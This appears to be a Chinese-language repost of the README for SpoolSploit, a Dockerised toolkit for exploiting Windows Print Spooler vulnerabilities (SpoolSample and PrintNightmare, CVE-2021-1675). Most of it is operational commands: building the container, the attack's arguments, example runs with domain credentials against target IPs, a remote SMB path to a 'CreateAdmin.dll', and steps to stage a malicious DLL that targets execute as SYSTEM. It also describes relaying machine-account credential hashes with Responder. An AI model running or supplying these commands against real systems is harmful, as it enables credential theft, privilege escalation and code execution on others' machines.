SpoolSploit

吉沃运营专员

工具源码：https://github.com/BeetleChunks/SpoolSploit

一组 Windows 打印后台处理程序利用与其他实用程序容器化以进行实际利用。

概要

SpoolSploit 是 Windows 打印后台处理程序漏洞的集合，与其他实用程序容器化以进行实际利用。一些非常有效的方法是中继机器帐户凭据以提升权限并在具有完全系统访问权限的终端上执行恶意 DLL。

开始

截至发布之日，SpoolSploit Docker 容器已在最新版本的 MacOS、Ubuntu Linux 和 Windows 10 上成功测试。

虽然不是必需的，但如果想在 SpoolSploit 容器中托管恶意 DLL 或进行凭证中继攻击，应该确保 445 端口未在运行 Docker 的主机上使用。在 Windows 主机上运行此容器时，这种情况最为普遍，因为它默认使用 445 端口。如果在主机上禁用 445 端口不切实际，那没关系！ 可以简单地在网络适配器配置为桥接模式的虚拟机中运行 docker 容器。这将允许提供恶意 DLL 和中继凭据。如果只想提供恶意 DLL，可以简单地将 DLL 托管在主机操作系统上的匿名访问共享或受感染的服务器共享上。

创建和访问 SpoolSploit Docker 容器

1、克隆这个存储库

1. git clone https://github.com/BeetleChunks/SpoolSploit

复制代码

2、构建 SpoolSploit Docker 容器镜像

1. cd SpoolSploit
   
2. sudo docker build -t spoolsploit .

复制代码

3、创建并启动 SpoolSploit Docker 容器

1. sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest

复制代码

4、附加到容器

1. sudo docker exec -it spoolsploit /bin/bash

复制代码

命令行参数

1. usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD
   
2. 
   
3. optional arguments:
   
4.   -h, --help            show this help message and exit
   
5.   -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
   
6.                         Attack type to execute on target(s).
   
7.   -rH RHOST, --rhost RHOST
   
8.                         Remote target IP, CIDR range, or filename (file:<path>)
   
9.   -rP {139,445}, --rport {139,445}
   
10.                         Remote SMB server port.
    
11.   -lH LHOST, --lhost LHOST
    
12.                         Listening hostname or IP
    
13.   -lS LSHARE, --lshare LSHARE
    
14.                         Staging SMB share (UNC)
    
15.   -d DOMAIN, --domain DOMAIN
    
16.                         Domain for authentication
    
17.   -u USER, --username USER
    
18.                         Username for authentication
    
19.   -p PASSWD, --password PASSWD
    
20.                         Password for authentication
    
21. 
    
22. Example - spoolsample:
    
23.   python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
    
24. 
    
25. Example - nightmare:
    
26.   python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

复制代码

SpoolSample - 捕获并中继 Windows 机器帐户凭据

SpoolSploit Docker 容器包括 Responder，用于中继从在 SpoolSploit 中执行 spoolsample 攻击获得的机器帐户哈希值。由于有几篇很棒的文章详细介绍了中继特权机器帐户凭据以进行特权升级的过程，因此我不会在这里详细介绍这些细节。

PrintNightmare (CVE-2021-1675) - 以 SYSTEM 身份在 Windows 目标上执行恶意 DLL

SpoolSploit 容器中包含一个通过 Impacket 实现的 SMB 服务器，在 SpoolSploit 中执行 printnightmare 攻击时，此服务器可用于托管恶意 DLL。默认的 SMB 服务器设置有效，但如果想自定义它们，可以修改位于 /home/dlogmas/smbserver/smb-v1.conf 的配置文件。

唯一需要做的就是将 DLL 复制到 SpoolSploit 容器中 SMB 服务器的共享文件夹。容器中的共享路径为 /home/dlogmas/smbserver/share/。以下命令演示了如何将 DLL 上传到 SpoolSploit 容器并使其可供 SMB 服务器访问。

1. sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
   
2. sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'

复制代码